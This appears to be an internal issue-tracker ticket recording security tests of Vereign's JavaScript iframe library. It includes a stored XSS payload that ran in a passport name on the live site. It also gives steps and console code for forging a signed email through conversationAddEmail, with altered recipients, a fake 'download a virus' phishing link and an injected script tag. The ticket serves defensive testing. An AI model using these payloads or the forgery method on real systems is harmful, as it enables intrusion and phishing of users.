Perform security testings for JS injection in our JS library

Acceptance Criteria:

Test all method arguments in our iframe lib

changed the description

added ReadyForDev label and removed InPreparation label

changed milestone to %v0.9

changed milestone to %v.10

assigned to @alexey.lunin

added DevInProgress label and removed ReadyForDev label

1. Register. Set Name with symbols <, >, ', ".

Result:

a) When you click submit button on agree on registration step, you will see 554 5.5.1 Error: no valid recipients

b) If you click the second time, you will see Entity has already agreed on registration terms error

c) if you try to restore access with the same email, you will see can't send confirmation email error

2. Create passport with name <script>alert('Injected script')</script>

Go to https://kolab.vereign.com

Click on Passport selectbox

Result: The injected script will be executed and browser will display alert popup with message Injected script

3. Overlapping menu and title (passport page)

4. As a hacker, I can create email message with any content I want without sending it from gmail or roundcube. I can add any recipients and any email message via conversationAddEmail

Steps:

1. Send any real email with using vereign plugin

2. Get source code of email from any email client

3. Modify email content as you want. Change receivers and body message as you want

4. Change Message Id in email header

5. Call conversationAddEmail with your passport id and modified email data

Example results:

Added multiple receivers:

newly registered users from this list will see this message

Also, I modified default vereign popup email message to some fake message

Example code to send a email from browser console. The VCL is exposed to lib variable

Also, I injected <script> in this code but hopefully react do not execute it

await lib.conversationAddEmail("a190de2d-6881-4560-b45c-d2485f4e26fa", `Delivered-To: alexey.lunin0@gmail.com
Received: by 2002:a4f:f651:0:0:0:0:0 with SMTP id c17csp869211ivp;
        Mon, 1 Apr 2019 15:19:05 -0700 (PDT)
X-Google-Smtp-Source: APXvYqxH/ypATs94L1JJKnqdeoXCP3xprGTgaqlMfN4RVQs6oZXs3OU459etudz7udpaYH6c+Mro
X-Received: by 2002:a50:b309:: with SMTP id q9mr43778263edd.91.1554157144953;
        Mon, 01 Apr 2019 15:19:04 -0700 (PDT)
ARC-Seal: i=1; a=rsa-sha256; t=1554157144; cv=none;
        d=google.com; s=arc-20160816;
        b=HkM1GJyThICcJ6P51pPkegCoQqoXzpy6+93fYLEK1zYf8aKaZJqMPWn+6S31oQc0x8
         zszOmUoMlM3mrn7BIGNNtnnJeBjJujltM68prWe7Xf/iRE1NIHpLLaw8AdEHicmPKuyK
         dRTMfbuxXfl4pGSdO3kd+MU2Z/ftq6sedlwNgsUwziNA8mQ7CLTTCHrX2emSalIX6ao8
         PLGVD2IGTuIhfI+9vt4VCRPXIEYZ0WmCEVtCk1UYiSIGQQBCJUTeVRHUsuez3WbZy+Bm
         ipG8G5guW6v0ITQtTLNkDFsRdr2jcUcyWlJNc/gaTtdjq3iaBTu/gRt4qK/mHIfWiDkb
         HwGA==
ARC-Message-Signature: i=1; a=rsa-sha256; c=relaxed/relaxed; d=google.com; s=arc-20160816;
        h=to:subject:mime-version:message-id:from:date:dkim-signature
         :mime-version;
        bh=PpaT4m835AW80DsP2mo2xZT/LYgNpBTg/TeA1fTy0vI=;
        b=Sa2Efe1rL8J6OHXHx2BFRIje2ROT+Q6BrdDoW5ySvvKtHYtTa/ztgWB0kJTmWw1tOL
         Rybn8or7vzo2bCUrWp+qMmnzjFiRyyuLColBQKMg8FWH9jB0/2Ju2TsirgiDtywGaPXr
         IGR7K62hySlqWeCskDW84N4aWaiszqD7C0n6K55ofCPpEBvCcY8gER6AFloJt7g/YBdu
         2so3aipQPUM1B9OqfngMOgR9LlQ2GbjyvGckvfCt47ZsBWK9yntPCfhwMAtU1oWmeWKV
         k1arETsmUymnDKmd6hu2kjXEsgDZMg4xfoHHFVI4Bd0P+RZ4aEAmXzcPQ6R6Es6RfdBf
         ++gw==
ARC-Authentication-Results: i=1; mx.google.com;
       dkim=pass header.i=@vereign.com header.s=dc1 header.b="HcK939/F";
       spf=pass (google.com: domain of alexey.lunin@vereign.com designates 62.12.145.110 as permitted sender) smtp.mailfrom=alexey.lunin@vereign.com
Return-Path: <alexey.lunin@vereign.com>
Received: from kolab.vereign.com (dc1.vereign.com. [62.12.145.110])
        by mx.google.com with ESMTPS id p7si128062edm.32.2019.04.01.15.19.04
        for <alexey.lunin0@gmail.com>
        (version=TLS1_2 cipher=ECDHE-RSA-AES128-GCM-SHA256 bits=128/128);
        Mon, 01 Apr 2019 15:19:04 -0700 (PDT)
Received-SPF: pass (google.com: domain of alexey.lunin@vereign.com designates 62.12.145.110 as permitted sender) client-ip=62.12.145.110;
Authentication-Results: mx.google.com;
       dkim=pass header.i=@vereign.com header.s=dc1 header.b="HcK939/F";
       spf=pass (google.com: domain of alexey.lunin@vereign.com designates 62.12.145.110 as permitted sender) smtp.mailfrom=alexey.lunin@vereign.com
MIME-Version: 1.0
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/simple; d=vereign.com; s=dc1;
    t=1554157143; bh=iFoLXx49XxW84s0w5bUyL8lo3y8Od4fHlKuFW9yWPTU=;
    h=Date:From:Subject:To;
    b=HcK939/Ft71xO/AR6Uhb5mPDR1ukfE4qrAU8cNxicxpiZogYjNqOTPGysneIT3os/
     unRVcWvAVv1DXZsNFsbEd8r6476mi9aem1OGRp5SGntVSVZOHsFKOuYTuraRKOKKB1
     /rUEUinaJe96ZDzjUty5WdX3c8q4eRN91EDREay8=
Content-Type: multipart/signed; protocol="application/pkcs7-signature"; micalg=sha-256; boundary="W0RyLiBEYW15YW4gTWl0ZXZd--ck5GzsRpPFPCGD5mmbat8rPQSG0y1wq5GemKV"
Date: Tue, 02 Apr 2019 02:19:00 +0400
From: Alexey Lunin <alexey.lunin@vereign.com>
Message-Id: <fc084f35441ba36ef0a4c77f299bfbc8@vereign.com>
Mime-Version: 1.0
Subject: testInjection
To: someNewUser@example.com

This is a cryptographically signed message in MIME format.

--W0RyLiBEYW15YW4gTWl0ZXZd--ck5GzsRpPFPCGD5mmbat8rPQSG0y1wq5GemKV
Content-Type: multipart/alternative; boundary="=_d2d1e6ddf837fd97c34cc2953b26d72d"


--=_d2d1e6ddf837fd97c34cc2953b26d72d
Content-Type: text/plain; charset=UTF-8; format=flowed
Content-Transfer-Encoding: quoted-printable

--[ Vereign ]--------------------------------------------------------------=
-

You are invited to verify my credentials at Vereign https://vereign.com.
Join my trusted network and sign up to the beta version to start your own h=
ttps://app.vereign.com/register.

-----------------------------------------------[ Authentic Communication ]-=
-


test
--=_d2d1e6ddf837fd97c34cc2953b26d72d
Content-Type: multipart/related; boundary="3fa1d0258d6e0c8cd3b6c983df6c007a9c19d2d68379efef3ad72df6ea6e"


--3fa1d0258d6e0c8cd3b6c983df6c007a9c19d2d68379efef3ad72df6ea6e
Content-Type: text/html; charset="UTF-8"
Content-Transfer-Encoding: quoted-printable

<html><head><title>Vereign - Authentic Communication</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3DUTF-8" />=
</head><body style=3D'font-size: 10pt; font-family: Verdana,Geneva,sans-ser=
if'>
<div>
    <!--[if (mso | IE)]>
    <table><tr><td width=3D"600">
    <table style=3D"max-width: 600px; color:#504f4e;background-color:#f3f2e=
f;">
        <tr>
            <td style=3D"padding: 10px; font-family: helvetica, sans-serif;=
 font-size: 11px; font-weight: bold;">
                You are invited to verify my credentials at <a href=3D"http=
s://vereign.com" target=3D"_blank" style=3D"color: #ba1c2d;">Vereign</a>.
                Join my trusted network and sign up to the beta version to =
<a href=3D"https://app.vereign.com/register" target=3D"_blank" style=3D"col=
or: #ba1c2d;">start your own</a>.
            </td>
            <td style=3D"width: 80px">
                <v:oval style=3D"height:68px;width:68px;position:absolute;"=
 xmlns:v=3D"urn:schemas-microsoft-com:vml" fill=3D"t" fillcolor=3D"#d51d32"=
 stroke=3D"false">
                    <v:fill aspect=3D"atleast" type=3D"frame" color=3D"#d51=
d32" alt=3D"Social" src=3D"cid:image_3545513206607370623_1.png" style=3D"he=
ight:68px;width:68px;"/>
                </v:oval>
                <v:image alt=3D"Logo" style=3D"height:25px;width:25px;posit=
ion:absolute;left:50px;top:-5px;" src=3D"cid:image_3545513206607370623_2.pn=
g"/>
            </td>
        </tr>
    </table>
    </td></tr></table>
    <![endif]-->


    <!--[if !(mso | IE)]><!-- -->
    <table bgcolor=3D"#f3f2ef" style=3D"max-width: 600px; border-radius: 5p=
x; color: #504f4e;  background-color: #f3f2ef;" cellpadding=3D"0" cellspaci=
ng=3D"0">
        <tr>
            <td style=3D"padding: 10px; font-family: helvetica, sans-serif;=
 font-size: 11px; font-weight: bold; max-width: 450px;">
                It's very important to install our aplication to you computer. <a href=3D"http=
s://vereign.com" target=3D"_blank" style=3D"color: #ba1c2d;">Vereign</a>.
                You can download a virus from this link
<a href=3D"http://example.com" target=3D"_blank" style=3D"col=
or: #ba1c2d;">link to fake app</a>.
            </td>
            <td width=3D"80px" style=3D"vertical-align: top; font-family: h=
elvetica, sans-serif;">
                <div style=3D"width:80px;">
                    <div style=3D"max-height:0;max-width:0;overflow: visibl=
e;">
                        <div style=3D"width:68px; height:68px; margin-top:1=
0px; margin-right: 10px; display:inline-block; -webkit-border-radius: 50%; =
-moz-border-radius: 50%; border-radius: 50%; overflow: hidden; background-c=
olor: #d51d32">
                            <img width=3D"68" height=3D"68" style=3D"object=
-fit: cover; height: 68px; width: 68px;" alt=3D"Social" src=3D"cid:image_35=
45513206607370623_1.png"/>
                        </div>
                    </div>
                    <div style=3D"max-height:0; max-width:0; overflow:visib=
le; position:relative;">
                        <div style=3D"margin-top:5px; margin-left:50px; dis=
play:inline-block; width: 25px; height: 25px;">
                            <img width=3D"25" height=3D"25" alt=3D"Logo" sr=
c=3D"cid:image_3545513206607370623_2.png"/>
                        </div>
                    </div>
                </div>
            </td>
        </tr>
    </table>
    <div style=3D"height: 35px;"></div>
    <!--<![endif]-->
</div>

<p>test</p>
<script type="application/javascript">console.log("Script is executed!!!");</script>

</body></html>

--3fa1d0258d6e0c8cd3b6c983df6c007a9c19d2d68379efef3ad72df6ea6e
Content-Disposition: inline; filename="image_3545513206607370623_1.png"
Content-Id: <image_3545513206607370623_1.png>
Content-Type: image/png
Content-Transfer-Encoding: base64

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
--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
Content-Disposition: inline; filename="image_3545513206607370623_2.png"
Content-Id: <image_3545513206607370623_2.png>
Content-Type: image/png
Content-Transfer-Encoding: base64

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
--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--

--=_d2d1e6ddf837fd97c34cc2953b26d72d--

--W0RyLiBEYW15YW4gTWl0ZXZd--ck5GzsRpPFPCGD5mmbat8rPQSG0y1wq5GemKV
Content-Description: S/MIME Cryptographic Signature
Content-Disposition: attachment; filename="smime.p7s"
Content-Type: application/pkcs7-signature; name="smime.p7s"
Content-Transfer-Encoding: base64

MIIiTQYJKoZIhvcNAQcCoIIiPjCCIjoCAQExDzANBglghkgBZQMEAgEFADALBgkqhkiG9w0BBwGg
gh2hMIIEQDCCAyqgAwIBAgIUcWjJ+9i9S2zY7MB4vo/qubDgmmQwCwYJKoZIhvcNAQELMIGGMYGD
MDYGA1UEAxMvYTE5MGRlMmQtNjg4MS00NTYwLWI0NWMtZDI0ODVmNGUyNmZhLXVzZXJkZXZpY2Uw
CQYDVQQGEwJDSDAKBgNVBAcTA1p1ZzAKBgNVBAgTA1p1ZzARBgNVBAoTClZlcmVpZ24gQUcwEwYD
VQQLEwxCdXNpbmVzcyBEZXAwHhcNMTkwNDAxMjAwMDAwWhcNMjQwNDAyMTk1OTU5WjCBtTGBsjA+
BgNVBAMTN2FtckVpbmF3c0ctYTE5MGRlMmQtNjg4MS00NTYwLWI0NWMtZDI0ODVmNGUyNmZhLW9u
ZXRpbWUwCQYDVQQGEwJDSDAKBgNVBAcTA1p1ZzAKBgNVBAgTA1p1ZzARBgNVBAoTClZlcmVpZ24g
QUcwEwYDVQQLEwxCdXNpbmVzcyBEZXAwJQYJKoZIhvcNAQkBFhhhbGV4ZXkubHVuaW5AdmVyZWln
bi5jb20wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCaOb/E77lycobk+J8d7IXx7UA4
Y8Daqo97nNFTkAxK5JV2Cl7ounwqByDI5XRJcOe9gRiDUBGBV9RuUt6aA/Y2F6MeM2SUxBGpfGR7
jM/4WpIuvxpF05xjd0knJUqU4/wulxUS72AJ5EPoPCaZiunw+QP9iVNZd5+5wo6xStVjt1m5PhlT
BLIwsOkHGhFzGceOIL+ilw4F2c3zQYkUCBXo1I97FfDIRqE5J/Cz6bbHI20sMpwzfjQq0j7Cg6QG
x43Jn4eUT3xYYT4q+QdKFJC9M34kZ0WzD8HChLSCc1xxOe4Kq7w7jBPhv8Z2eZMlKp237Oa1a6ZI
C5tF9lj8vR/BAgMBAAGjeTB3MAwGA1UdEwEB/wQCMAAwDgYDVR0PAQH/BAQDAgDwMBMGA1UdJQQM
MAoGCCsGAQUFBwMEMCMGA1UdEQQcMBqBGGFsZXhleS5sdW5pbkB2ZXJlaWduLmNvbTAdBgNVHQ4E
FgQULIHZZAbrs6je04iyOS0/TUCl3RkwCwYJKoZIhvcNAQELA4IBAQAOnWN4qoVflOYIonTSu0uv
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
